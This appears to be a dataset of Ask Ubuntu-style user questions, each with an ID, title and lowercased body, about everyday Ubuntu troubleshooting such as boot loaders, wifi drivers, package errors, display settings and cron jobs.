93142	need some advise on pitching ubuntu sbs and desktops for my company	in the next couple of weeks i need to present an it presentation for future i equipment for the small company i would with . the have been shrouded by the microsoft and apple blanket and introducing ubuntu to them is going to be a tough task . can anyone give me some advise who has had the task of pitching ubuntu for business being the favourable os over windows which they are currently using ? i will say none of them are tech-savvy and some of them do n't even know how to send emails . any advice would be gratefully appreciated .
93144	windows get lost moving between workspaces in expo	is there any way to fix this ? i 'm using ubuntu 11.10 .
93145	how do i use the equinox theme ?	i installed the equinox themes in 11.10 but i 'm not quite sure how to use them ; i installed gtk-chtheme and they 're all in there , but nothing appears to happen when i press apply and i do n't see the themes in the appearance menu ... what am i doing wrong ? i want to apply the theme and icon set . thanks !
93146	to use windows and ubuntu on one computer , which should i install first ?	i understand it 's possible to install ubuntu first , and later windows or to install windows first , and then ubuntu , but assuming i have the freedom to do either , which is the better , easier , and more reliable installation order ?
93147	unable to use virt-manager	on ubuntu server 11.10 i am trying to install a virtual machine using virt-manager . i believe that i have everything right , but when i go and run the command virt-manager i get the following error message : file `` /usr/share/virt-manager/virt-manager.py '' , line 383 , in < module > main ( ) file `` /usr/share/virt-manager/virt-manager.py '' , line 285 , in main raise runtimeerror ( _ ( `` unable to initialize gtk : % s '' ) % gtk_error ) runtimeerror : unable to initialize gtk : could not open display i want to use virt-manager so that i can quickly and efficiently create multiple ( 6 ) virtual machines , but is there any other alternative that does not take hours per host system , and is still lightweight ? my machine is as follows : ubuntu server 11.10 8 cores @ 2.5ghz 64 gb ram packages : qemu-kvm libvirt-bin virt-manager bridge-utils gnome-core
93148	how to install .deb files the old fashion way ?	is there a way to install deb-files the old fashion way in ubuntu 11.10 ? i ca n't install them through software central ( programcentral fรถr ubuntu in swedish ) . i wan na be abel to install them like in 7.10 . is this possible ?
93155	amd athlon 64x2 dual core 2.6 ghz	64-bit or 32-bit ? i need to run graphics software such as adobe master collection cs3 and ms office publisher . what do i need ot make this work ?
93160	what to do to get grub multiple booting ?	there is win7 and ubuntu11.10 and i want to install kubuntu also ( 64bit ) . i have started installation on a separate partition and decided to install grub on this and not on boot-one , where it still is . in the mid of the process i stopped , because two grubs are not working , i guess . but the question of the installer was not to add a new system , instead to install grub ( new i guess ) . does this mean it will find automatically my old two systems or will i have trouble to add those again ? has somebody done it , working with chosing all three + options ? also there are now some kubuntu files in my /home on another partition , seems to be damaged , because i can not delete them , also in /usr/share . they are perhaps from installing an iso of kubuntu on cd , which works , but not fine . the boot screen is not to read , with `` enter '' it starts . so two questions : what does grub really do , while `` installed '' ? how to delete a damaged empty file , which seems to be only the icon . i have no right to delete , because it is not there or doesnâ´t exist , is only to see . strange , isnâ´t it ?
93165	ubuntu missing from hard drive boot	ubuntu is the only os installed on my acer netbook . few , if any , problems until , with no warning , it vanished from the boot list for the hard drive . i have been a ble to create a bootable usb to be ablee to use the netbook but have not been able to restore ubuntu to the hard drive boot list . as you can probabaly tell from the way the problem is described , i am a complete novice so any help you can give should assume no knowledge at all on my part and should be written as if for a simpleton . thank you .
93168	where is the alpha 1 release of kubuntu 12.04 ?	i have been looking around , and i ca n't find any official informational update on the first alpha release of kubuntu precise . was alpha 1 released ?
93178	no sound from heaphone jack on an asus x92v	a friend has just installed xubuntu on my laptop ( asus z92v ) . the laptop speakers work but there is no sound coming out of the headphone jack . i use the laptop as an internet radio , cd player and all , can anybody help ? ps i am not an it expert , so please talk to me like you would to a 5yo !
93183	changes made by dconf-tools are lost when logging off	i 'm trying to get the wicd tray icon to show up in 11.10 unity desktop . when i use dconf editor to add 'wicd ' to the whitelist in unity > panel , it shows the change but after i log off and then log on the wicd icon is not in the tray . when i open dconf editor , the change i made is gone . trying sudo dconf or gksu dconf opens some other application . is dconf broken ? addendum : i have discovered that the configuration file ( ~/.conf/dconf/user ) is changed when when ever i use dconf editor to change it , but it is also changed when logging on after logging off . apparently some do-gooder process reverts it to default without notifying you . time to file a bug ? perhaps this bug ?
93185	xtitle not changing title in ubuntu 11.04	i 'm trying to find a way to quickly change the title of a gnome terminal 2.32.1 window since i have quite a few open and i 'm editing different files in each , using a compiler in one , tailing log files in others and so forth . hence it 's a pain looking for the window i want when they all say pax @ pax-desktop : ~ . this question led me to try xtitle but , for some reason it 's not actually changing the title . executing xtitle xyzzy results in no visible feedback but piping it through od confirms it 's outputting an escape sequence ( which i 'm assuming is correct , though i have n't checked in detail ) : pax @ pax-desktop : ~/porn_dir $ xtitle xyzzy | od -xcb 0000000 5d1b 3b32 7978 7a7a 0779 5d1b 3b31 7978 033 ] 2 ; x y z z y \a 033 ] 1 ; x y 033 135 062 073 170 171 172 172 171 007 033 135 061 073 170 171 0000020 7a7a 0779 z z y \a 172 172 171 007 0000024 i can go into the menu terminal | set title and change it okay from there but i would much prefer a command-line solution since i can do it automatically ( such as create a vi alias which sets the title to vi filename before running the editor and resets it on exit ) . in the profile preferences , the initial title is set to terminal and the when terminal commands set their own titles is set to replace initial title . there 's also only the one profile default which is the one i 'm using .
93189	how do i remove my name from gnome shell panel ?	when i installed the latest version of ubuntu with gnome shell , i saw it displays my name on the right-hand side of the top panel . i know my own name , i do n't need to see it on screen all the time and besides , it takes up way to much space . how do i remove my name from the gnome shell panel ?
93191	vnc painting fails	i updated one of our servers to ubuntu 11.10 . previously we were using centos 6.1 . when using centos i was able to connect to it using vnc viewer from windows 7 machines . but after installing ubuntu 11.10 , when i connect , i can connect and view the desktop , but there is nothing on the desktop . no menus , or gadgets can be seen . if i try to invoke some gui like gedit its giving me an error xlib : extension `` randr '' missing on display `` :0 '' keyboard inputs also does not work properly . when i pressed d key on keyboard it minimized the terminal window . i ca n't understand what is happening . is there any solution for this ?
93200	ca n't run tor from terminal	so ... i ca n't run tor from my terminal . i have tried many different things , but i could n't make it run . once , it did n't stop to run when i wanted to . at my other attempt i also ended up failing because when it stopped to run i could n't connect myself to the internet . i hope you can help me here guys . to be more specific , what i mean by `` ca n't run from terminal '' is that i ca n't hide my ip if i 'm installing a program from terminal , for instance . or if i 'm running another program that is making a connection with the internet , my ip is n't being hidden . what i want is to make tor work for all my programs . so my ip would be hidden in any connection with the internet .
93201	why ca n't i boot into windows after adjusting my partitions ?	i have a hp pavilion dv6 with windows 7 and a 500gb hd split into 3 drives -c : , a system tools and something else . i shrank 100gb on the c : and used that to install ubuntu . meaning i literally shrank by a 100gb , formatted it and moved into the installation of ubuntu . i did n't restart a couple of times just so windows could get used to the new drive . during the installation , i had ubuntu `` delete '' the new drive , format to ext4 and install ubuntu . now i can boot ubuntu but i simply can not boot into windows . system-repair does not even find windows 7. fixmbr works but fixboot throws up an error . gparted shows this : boot-repair link is this http : //paste.ubuntu.com/794048/
93202	how do i check fglrx 's version ?	i 'd like to know the version of fglrx installed in my ubuntu 10.04.3 box . i 'm not familiar with fglrx , so i found several ways by google . 1 cat /var/log/xorg.0.log | grep fglrx [ ... ] ( ii ) fglrx ( 0 ) : kernel module version information : ( ii ) fglrx ( 0 ) : name : fglrx ( ii ) fglrx ( 0 ) : version : 8.72.11 ( ii ) fglrx ( 0 ) : date : apr 8 2010 ( ii ) fglrx ( 0 ) : desc : ati firegl drm kernel module ( ii ) fglrx ( 0 ) : kernel module version matches driver . ( ii ) fglrx ( 0 ) : kernel module build time information : ( ii ) fglrx ( 0 ) : build-kernel uts_release : 2.6.32-37-generic ( ii ) fglrx ( 0 ) : build-kernel modversions : yes ( ii ) fglrx ( 0 ) : build-kernel __smp__ : yes ( ii ) fglrx ( 0 ) : build-kernel page_size : 0x1000 ( ii ) fglrx ( 0 ) : [ uki ] register handle = 0x00004000 [ ... ] 2 ls /var/lib/dkms/fglrx/ 8.723.1 kernel-2.6.32-37-generic-x86_64 3 in system- > administration- > synaptic package manager , i searched out the 'fglrx ' package , it says 'installed version ' is '2:8723.1-0ubuntu5 ' . both 2 and 3 have '8.723.1 ' in their versions , but they are different from 1 . my questions is : which one is right ? what 's the best ( official ) way to check the version of fglrx ? thanks .
93204	load button in aptoncd wont work	i am using aptoncd for backup the cache but in ubuntu 11.10 the load button wont work so i opened from terminal when i pressing load button terminal shows timeout error how to solve this
93210	firefox 3.6.24 does not see java plugin	6 jan 2012 v.puzzled , ubuntu 10.04 lucid lynx , firefox 3.6.24 , sun-java6-plugin 6.26-2lucid1 : firefox does not seem to even know that the java plugin is there ( it is installed , and re-installed ) , i.e. , it does not show up in firefox 's tools - > addons - > plugins , nor does it run . ( it did , until some recent update.- )
93213	how do i get close to 1600x1600 resolution with dual monitors ?	i have a pair of 1440 x 900 monitors that i want to run in portrait mode ( not mirrored ) . when i select 800 x 600 for both , it works , but i am not near the maximum of the monitor hardware nor am i near what appears to be the addressable space of 1600 x 1600 . if i select 1280 x 800 for both , i get the following error : the selected configuration could not be applied : requested position/size for crtc 148 is outside the allowed limit : position= ( 800,0 ) , size= ( 1280,800 ) , maximum= ( 1600,1600 ) . superficially it appears this error is a bug . a pair of 800 pixels side by side ( when in portrait ) does not exceed 1600 , and of course 1280 does not exceed it . how can i get this to work . of course i would prefer a pair set to 1440 x 900 which is the actual lcd resolution , but then of course the 900 side by side pair would total 1800 and so i wo n't even bother with that . the correct rotation setting seems to be `` counterclockwise '' . i am using ubuntu 11.10 and a radeon hd 5450 and the catalyst 11.12 for x86-64 architecture . i am dual booting . i had no complaints with the visual quality on windows 7 , it looked good and used the natural resolution ( 1440 x 900 ) even in portrait . thus it seems safe to conclude the hardware can do it but ubuntu and the driver for ubuntu is at fault . although it would be a shame to do so given the windows 7 example , i would be willing to buy a new video card if a card and driver combination successfully displays dual monitors in 1440 x 900 ( each ) non-mirrored portrait on ubuntu 11.10 . please post a comment if you have this working . at this point i would even consider landscape non-mirrored dual monitors .
93217	unable install software using sudo apt-get install	when i used sudo apt-get install it is either getting struck or it is showing an error like this e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? can somebody suggest me how to solve this problem ? ?
93220	alternate cd image downloaded last year gives different hash	i had downloaded the alternate cd images through torrents some time last year , and now that i need it again i decided to check it 's md5 hash . $ md5sum ubuntu-11.10-alternate-i386.iso b502888194367acdec4d79203e7a539c ubuntu-11.10-alternate-i386.iso now the problem is , the reference hashes it 's supposed to match to is completely different : 24da873c870d6a3dbfc17390dda52eb8 ubuntu-11.10-alternate-i386.iso can i safely conclude the image i downloaded is corrupted ? reference ubuntuhashes - community ubuntu documentation
93226	ubuntu freezes . which logs can i check out ?	so my computer has lately started freezing completely when i run some programs that , in the past , would work great . what i am unsure about however , is what logs that are available to me that could help me track down the issue after a reboot ? thanks
93230	macbook pro 8.1 keyboard backlight on ubuntu 11.04 with kde	can anyone tell me how to enable my keyboard 's backlight ? it works fine using gdm and unity . i recently installed kde 4.6.5 and started using kdm , everything works fine as in unity , only my keyboard 's backlight on the macbookpro 8.1 does not come on . kindly assist . regards .
93231	is there any special software for copy , cut like operations ?	in windows there is `` tera-copy '' for copy , cut and delete like operations . is there is any software in ubuntu . because i am using ubuntu11.10 the default copy manager is hanging some times and very slow .
93236	how do i install and run apache2 ?	i have downloaded apache2 from the official site and compiled and installed it per the given instructions there , but on running i get an error : ulimit : 88 : error setting limit ( operation not permitted ) /usr/sbin/apache2ctl : 148 : /usr/sbin/apache2 : not found the apache error log may have more information .
93241	enabling multi-touch settings ?	is there any way to enable the touchscreen setting in ubuntu 11.10 ? like hold to right-click , two finger to scroll thanks ( :
93242	can not install wine because of broken dependency	i am trying to install wine on a 64-bit natty . it was installed , but one of my regular update & dist-upgrades removed it ( did n't pay enough attention to which packages would be removed ) . now when i 'm trying to install it , i get the following error : the following packages have unmet dependencies : wine : depends : wine1.3 but it is not going to be installed depends : ia32-libs ( > = 1.6 ) but it is not going to be installed e : broken packages i found this question on askubuntu , but the accepted answer ( change the mirror to the main one ) did n't work for me . i also tried to disable all sources that are n't enabled after a clean install , do an update an install wine , did n't work . here 's my /etc/apt/sources.list ( sans comments for brewity ) : deb http : //us.archive.ubuntu.com/ubuntu/ natty main restricted multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ natty main universe restricted multiverse deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates main restricted multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-updates main universe restricted multiverse deb http : //us.archive.ubuntu.com/ubuntu/ natty universe deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates universe deb http : //archive.canonical.com/ubuntu natty partner deb-src http : //archive.canonical.com/ubuntu natty partner deb http : //us.archive.ubuntu.com/ubuntu/ natty-security main restricted multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-security main universe restricted multiverse deb http : //us.archive.ubuntu.com/ubuntu/ natty-security universe deb http : //linux.dropbox.com/ubuntu natty main deb-src http : //linux.dropbox.com/ubuntu natty main deb http : //ppa.launchpad.net/libv4l/ppa/ubuntu natty main deb-src http : //ppa.launchpad.net/libv4l/ppa/ubuntu natty main deb http : //apt.mucommander.com stable main non-free contrib deb http : //extras.ubuntu.com/ubuntu natty main deb http : //archive.canonical.com/ natty partner deb-src http : //archive.canonical.com/ natty partner and here 's the contents of the files in /etc/apt/sources.list.d/ : deb http : //ppa.launchpad.net/gm-notify-maintainers/ppa/ubuntu natty main deb http : //ppa.launchpad.net/gm-notify-maintainers/ppa/ubuntu natty main deb http : //ppa.launchpad.net/mozillateam/firefox-next/ubuntu natty main deb-src http : //ppa.launchpad.net/mozillateam/firefox-next/ubuntu natty main deb http : //deb.opera.com/opera/ stable non-free deb http : //ppa.launchpad.net/resmo/git-ftp/ubuntu natty main deb-src http : //ppa.launchpad.net/resmo/git-ftp/ubuntu natty main deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu natty main deb http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu natty main deb-src http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu natty main
93249	ca n't access the factory recovery after installing ubuntu	i installed ubuntu alongside xp on a dell laptop which had a recovery partition for re-installing xp . xp and ubuntu both worked ok. now i want to see the laptop so i need to restore the laptop to factory state but i ca n't access the recovery by pressing ctrl-f11 any help will be appreciated . hamid
93255	disk read error after cloning	after cloning a windows hard disk using dd , windows failed to startup , giving 'disk read error ' . although i know that there are faulty sectors on the old disk , the startup completes , albeit slowly . whilst i would n't have been surprised if the new disk exhibited the same problems as the old , i 'm surprised that it wo n't even start up . is this a different problem that is correctable ? ( i had to edit the bios after doing the copy to start up from hdd rather than cd although i 'd removed the cd . could this be something else in bios that needs correcting ? )
93261	why ubuntuone for ios does n't make use of all the ipad screen ?	it is nice to see the ubuntu one files app for ios , but why has n't the additional work been done so that it also works well on larger screens of the ipad ?
93266	will removing empathy ( for pidgin ) break my desktop integration ?	the question ( here ) answers the question about whether or not empathy can be replaced with pidgin . what it does n't answer is whether or not removing empathy ( via software centre ) will break ubuntu 11.10 because of the obvious integration ( like statuses in messaging menu ) . i prefer pidgin 's ( more accurate ) notifications to empathy 's , hence the desire to change . can i safely remove empathy ?
93270	how to install backtrack 5 tool ?	i have a problem with a backtrack 5 installation . so i just want to install backtrack 5 tool on my ubuntu 11.10 . can it run on ubuntu 11.10 ?
93272	is there an rcconf equivalent for upstart that works on the command line ?	while i 'm a big fan of upstart i would like to see a rcconf tool that can manage both traditional sysv services as well as upstart in a quick visual way through the command line , for use over ssh . does any unified tool like this exist ?
93276	upstart not running my dynamic dns script	i have a dynamic dns script as follows : # ! /bin/bash curl -kl # `` http : //example.com/updatedns.php '' echo $ ? > > /var/log/ddns ... saved to /usr/local/bin/ddns . obviously the url above is n't the one i actually use , but the url is meant to set the a record of my domain to the ip of the machine that requested it . i have confirmed it has been chmodded and runs from the command line , however , upstart , which has been set up with the following script : start on network started exec /usr/local/bin/ddns ... does n't execute it when the network starts ( which i 'm assuming is when the machine is booted or i connect the network cord ) . i googled start on network started and found some results saying that this stanza does n't actually get started properly , but still gets triggered , however i 'm not sure if that 's related or not . am i doing something wrong ? i 'm running ubuntu server 11.10 .
93278	how to change gtk+ theme ?	i am new in ubuntu , i have installed a large set of themes in ubuntu , i have also installed advanced-system-settings but when i want to change theme in advaced system settings , themes are not in drop down list ?
93288	how do i compile gwget from source ?	i extracted the source and ran terminal i logged to source directory using following command : sudo ./configure it errors : command not found ! what is wrong with it ?
93296	wi-fi with ath5k - bad connections after idle	i used some older ubuntu ( so i guess it used madwifi ) , now i installed new ubuntu 11.10 , but i got problem with wifi , it uses ath5k - everything works , downloading etc , but if i stay to read some page for example ( facebook messages etc ) a then i am trying interact with the page , it does not load . i have to reload whole tab ... so the wifi somehow freeze when is in the idle ... i find several people with the same/similar issue : https : //bbs.archlinux.org/viewtopic.php ? pid=702230 http : //linux.derkeiler.com/mailing-lists/suse/2010-05/msg00880.html but i did not find solution ... i guess i can recompile madwifi , but this i consider as the last option ... my wifi : ethernet controller : atheros communications inc. ar5212/ar5213 multiprotocol mac/baseband processor ( rev 01 ) i tried disable ipv6 and install compact wireless drivers , did not help . thank you very much !
93299	wifi stuck on `` authentication required '' after system resume ?	when i suspend my laptop the wifi disconnects obviously , however 9/10 times when it resumes from suspension the wifi is just sitting there on `` authentication required '' and no popup appears for me to authenticate , even turning off the wifi and back on does not fix it , i need to log out and back in for it to work . what would be causing this and how may i fix it ?
93301	wired connection drops out after a while	i get connected to the internet automatically when i turn on my computer i have configured the network from the network manager in the system setting and created a new pppoe connection . so it gets connected directly when i turn on my computer but after working on net or when i have kept some files on downloads the network gets disconnected or other words connection gets dropped . the message i get is wired network is disconnected . and then i can not reconnect because in the network manager the wired connection gets disappeared so i have to restart my computer to get connected .. so can anybody help me to configure the network setting of mine.. it will be great if anyone can tell me how to set auto redial ...
93302	windows hostnames are not resolved	i know that similar questions has already been asked . however , as suggested in the answers to that question i have the winbind package installed and have wins in /etc/nsswitch.conf : hosts : files mdns4_minimal [ notfound=return ] dns wins mdns4 nevertheless , attempts to ping windows hostnames give ping : unknown host < hostname > restarting winbind service does n't help . i have ubuntu 11.10 and winbind 3.5.11 .
93303	does ubuntu 10 04 lts have a built in firewall and antivirus	i have just installed ubuntu 10 04 lts on my laptop and i am trying to find a firewall and anti-virus suite for it .
93306	recovering tomcat6 default configuration	i 'm experimenting with java web development , and it seems that i 've messed up with my current tomcat6 installation , especially its configuration files . how to recover tomcat6 to its original state as if it was freshly installed ? ps : re-installing it ( via apt-get ) does n't seem to work !
93308	dash in unity-2d : how to tweak search ?	for some reason after recent update unity-2d dash does n't show programs : i type `` firefox '' but it shows only files and folders as shown on the following image : however dash finds firefox after pressing the second icon at the bottom of the dash window , as shown on the following image : what i want is to be able to launch programs `` in a few seconds '' without using the mouse . ideally , by typing `` superfirefenter '' . i have tried to find a dash manual using google , but have failed to find anything useful . is there any way to tweak the dash in such a way that `` superfirefenter '' would launch firefox , `` supertermenter '' would launch the terminal and so on ? is there any dash manual , suggesting how to tweak it ? update : after another ubuntu update and subsequent reboot the problem has disappeared . so i think the question can be closed . however i 'm still interested in dash manual , describing , how to tweak dash . so if someone has an idea on where to find one , it would be great .
93309	how do i render svg files with subpixel hinting for text ?	i need to render an svg image with very small text , so i would like to use subpixel hinting , like so : inkscape does n't provide an option to use subpixel hinting for png export , neither does the gimp . however , i get excellent results when i view the image in eog , the gnome image viewer . how do i use whatever image viewer uses to render my svgs to png files with transparency ? since subpixel hinting depends on the order of red , green and blue subpixels , eog disables it when i use the save as button . i can take a screenshot , but then i do n't have transparency in my images . is there any piece of software that can render text to raster images with anti-aliasing and subpixel hinting ?
93310	updating karmic	i have a server which fails to do any updates $ sudo apt-get update ign http : //security.ubuntu.com karmic-security release.gpg ign http : //gb.archive.ubuntu.com karmic release.gpg ... ign http : //gb.archive.ubuntu.com karmic-updates/multiverse sources err http : //gb.archive.ubuntu.com karmic/main packages 404 not found ... w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/karmic-updates/multiverse/source/sources.gz 404 not found e : some index files failed to download , they have been ignored , or old ones used instead . i have tried performing an upgrade , but that fails , presumable because it cant access anything above ! $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . it currently is at : - $ uname -a linux gateway 2.6.31-23-generic-pae # 75-ubuntu smp fri mar 18 19:14:10 utc 2011 i686 gnu/linux $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 9.10 release : 9.10 codename : karmic my question is , can i just replace the /etc/apt/sources.list with one from the current disto ? currently contains lines like : - deb http : //security.ubuntu.com/ubuntu karmic-security main restricted deb-src http : //security.ubuntu.com/ubuntu karmic-security main restricted replace to so it has valid release : - deb http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb-src http : //security.ubuntu.com/ubuntu oneiric-security main restricted i see that it successfully hits the packages . ... hit http : //gb.archive.ubuntu.com oneiric-backports/restricted packages ... but just concerned if this is a good idea or not ?
93311	marlin as default file manager in gnome 3.2 ( ubuntu 11.10 )	im marlin preferences i click on `` make my default file manager '' , but nothing changed . all apps like chrome or skype still open nautilus like default . thanx for any help .
93313	cron job not running ?	i have a crontab file that looks like this : * * * * * /home/abliskovs/update/update.sh however when i check the syslog for evidence that the job has run , there is nothing that might indicate that it ever ran . how can i check if it 's running ? crontab -l outputs the following : * * * * * /home/abliskovs/update/update.sh
93314	usb keyboard does not work on ubuntu 11.10	my laptop model : dell n4110 os : ubuntu 11.10 i have brought a usb keyboard and plugged into my laptop . but it does not work . please suggest me what should i do ?
93316	is the virtual space for dual monitors determined by the graphics card ?	i want to run dual monitors and find that i can do so if i select the resolution to be 800 x 600 for each , since the sum of dimensions when not mirrored is 1600 x 600 both landscape or 1200 x 800 both portrait . the trouble is that the natural resolution of my monitors is much more than 800 x 600 , in fact it is 1440 x 900 . summing in either direction exceeds the 1600 x 1600 virtual space . is this a limitation i can improve by using a different video card ( and matching driver ) ? edit : i am using a radeon hd 5450 and the latest ( dec 2011 ) catalyst driver for x86-64 architecture on ubuntu 11.10 . i did not write a custom xorg.conf .
93319	function keys the wrong way around on packard bell dot s	i have a packard bell dot s netbook ( also called dot 510 i think ) , and to get an f3 key press i have to press fn+f3 , pressing just f3 on its own turns the wireless on or off . i make heavy use of the f keys , so i 'd like it if i did n't have to use the fn key to get them . my bios does n't seem to have an option to swap them round , is there any way i can do it at the os level in ubuntu ? thanks . update fwiw here is what is in my bios : insydeh20 setup utility rev 3.5 information : cpu type.speed , memory info etc etc main : time , date , quiet boot , network boot , f12 boot menu , d2d recovery , sata mode security : set supervisor password , set user password , set hdd password boot : boot order stuff exit : saving changes etc etc unless there is a hidden page ? i recall a bios from years ago that had a hidden page . googling shows nothing tho . update 2 ok , it seems that xmodmad will only work for some keys . the wireless switch key , for example , works even when x is not running , so it must be at a lower level that it is being intercepted . i ca n't even get the keycodes for this key .
93321	opening doc file in libreoffice with password in writing mode	i want to open password protected [ not read only ] doc file [ saved in libreoffice ] to write , but i cant type . how to solve this problem ?
93328	assigning permission to c++ program	i 'm trying to run a program in c++ compiladom in ubuntu , but is giving permission denied . i tried chmod 755 file but does not work . how do i solve this ?
93329	how can i change my nautilus and icon themes back to what i had before ?	for some reason , from about a few days ago , windows and icons look like linux circa 1995 . i tried resetting my theme to `` radiance '' , but it was already set to that . i do n't know why anything would suddenly look different in my themes or icon sets or anything . i have n't done anything to change my interface . in any case , how do i get back the theme i had before ? i think it was `` human '' or `` gnome '' or something like that . nice orange folders and stuff .
93334	how do i make quickly apps install into /opt ?	i 've created the 'hello world ' example using quickly and created a debian package using quickly package . this package installs the app into /usr/share and /usr/bin . however , the packaging requirements at developer.ubuntu.com say that the package has to install into /opt . how do i convert my quickly application so that it conforms with the requirements ?
93339	unable to seek in mp3 encoded files	when i try to play any mp3 encoded song in rhythmbox , the seek bar is disabled . upon trying to play the same files in totem , the same problem appears again . i think that the problem started after following option c in this guide , and then undoing it . i 've tried reinstalling gstreamer0.1-plugin-ugly , gstreamer0.1-ffmpeg and gstreamer0.1-fluendo-mp3 , which are the packages i think rhythmbox is asking for upon playing a mp3 encoded file . running ubuntu 10.04 , recently updated .
93340	how to open the display from ssh login ?	is there any way to open the desktop display from terminal ( ssh login ) ?
93342	how to use intel 2200bg on an hp pavillion dv1000 ?	i have an hp pavillion dv1000 and i can not use the wireless with any distro . i am a new user in linux and i need a guide to follow . do you know something ?
93350	how to increase the update download speed ?	after installing ubuntu 11.10 , i opened the update manager . i found that the average download speed for updates is about 12 kb/sec . but i used to download with 64 kb/sec .
93352	ubuntu one will not upload files - why ?	i recently noticed my ubuntu one files stopped to be synched . i guess it has something to do with me buying a new disk , copying things over there and leaving them on ubuntu one meanwhile , because i think it stopped syncing just after me buying the new disk . however , i tried `` file sync error . '' with ubuntu one in order to reset my ubuntu one connection , but now i created folder with two ( empty ) files in it . the folder gets uploaded to ubuntu one but the files do not ( subfolders do not get uploaded either ) . now u1sdtool -s gives this : drew @ steve : ~ $ u1sdtool -s state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true queues : idle ubuntu control center says synchronization is complete , but it is not . any ideas ? this used to work fine . ( byt the way - on two folders that stopped to be synced , the emblem green check is still displayed )
93360	which is the ( special ) shortcut for move windows ?	some times ( using only the touchpad laptop ) a special controls appears for move the current window . please , see this screenshot before reply : which is this shortcut ? i ca n't reproduce it ! thanks in advance ! ! : )
93366	can i use kernel-seeds on top of ubuntu kernels ?	former gentoo user here . i 'm trying to optimize the system by recompiling kernel specifically for my processor and disabling code i wo n't be using ( to reduce memory consumption , improve speed etc. ) . i wonder if anybody has lucky experiences with kernel-seeds on top of ubuntu . kernel configuration is a dark and deep forest and i 'm not sure what would be the best strategy here since i 'm concerned about ubuntu-specific options . should i start with ubuntu 's configuration and one by one disable the options i do n't need or just start configuring it from scratch ( default .config or kernel-seeds.. ) ?
93367	usb boot flashes and crashes	i went through the steps listed on http : //www.ubuntu.com/download/ubuntu/download but it does not work . i start up my toshiba satellite laptop and press f12 to pull up the boot menu . i select my usb drive and the screen goes black for a few seconds as if it is loading up . there is a quick flash followed by a black screen for a few more seconds and finally ending with the system shutting down . i can still access the bios and the boot menu , but i can no longer start up in windows ( system resume nor system recovery ) . edit : i 'm not 100 % positive but i believe this is my laptop model - http : //www.toshibadirect.com/td/b2c/retail-product.jsp ? poid=452488
93369	download manager for chrome in kubuntu ?	how can i integrate kget into google chrome ? alternatively what other good download managers are there for chrome that will work in kubuntu ? thanks
93373	my battery died , and now ubuntu wo n't start	i was working on ubuntu 10.04 , then the battery died . i plugged in the charger , and now ubuntu wo n't start . it keeps showing an error screen similar to the following : except that the grub version is gnu grub version 1.98-1ubuntu12 and the background is black , because i 'm using ubuntu 10.04 .
93390	cdrom listed in mtab but not in fstab ?	my problem is that the cdrom is listed properly in /etc/mtab file but not in /etc/fstab file . mtab contents : /dev/sda1 / ext4 rw , errors=remount-ro , commit=0 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 none /sys sysfs rw , noexec , nosuid , nodev 0 0 fusectl /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 none /dev devtmpfs rw , mode=0755 0 0 none /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 none /dev/shm tmpfs rw , nosuid , nodev 0 0 none /var/run tmpfs rw , nosuid , mode=0755 0 0 none /var/lock tmpfs rw , noexec , nosuid , nodev 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfs-fuse-daemon /home/ryan/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=ryan 0 0 /dev/sr0 /media/kubuntu\04011.10\040i386 iso9660 ro , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 0 0 /etc/mtab ( end ) fstab contents : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=c72c38c5-9b1b-4ae6-bafb-860988a3bcae / ext4 errors=remount-ro 0 0 # swap was on /dev/sda5 during installation uuid=25639380-c36f-491f-912d-a01477bf0a5c none swap sw 0 0 see..no cdrom in fstab . actual problem was that i was n't able to use cdrom as a source from synaptic ... searched..found out about apt-cdrom ... used ... got unable to mount error ... again searched ... found out that apt-get uses sources listed in /etc/apt/sources.list and to add a cdrom to this list , it must be in fstab ... .again searched..until now the conclusion is that i have to maually add cdrom to fstab.i 'll be using this as help . but is n't this a problem ... manually fixing an important system file..why debian/mint guys are not fixing it ? ? ? ? ? system snapshots are from linux mint 11 but i have similar issues with kubuntu 11.10 both are running as guests using virtual box on windows 7 ( seeee a linux newbie ) thanks..
93391	installing ubuntu on windows partition caused administator user to be destroyed ? why ?	i inserted an 11.10 dvd while in windows and was asked if wanted to install on windows like another program , said yes - but in the process my administrator user in windows was destroyed and the password entered to start ubuntu was not recognised . the start up window and control panel for users only show other users , the documents and settings are still present on the hard drive . even with system restore the user did not re-appear .
93394	starting program from usb disk	i have to fix issues on my filesystem for which i ask for help in this thread : ubuntu 11.10 oneiric low disk space in order to do this i have to install one `` tuxboot-linux-25-64bit '' which i download and copy do clean formated ( fat32 ) usb disk . this file have to download linux iso file with gparted live cd . but when i doubleclick this file it not runs program but opens `` geany '' ? ? allow executing file as program is checked under properties ( from nautilus ) . i would like to make systemdisk with gparted installed so please help . ubuntu gnome 11.10 64bit
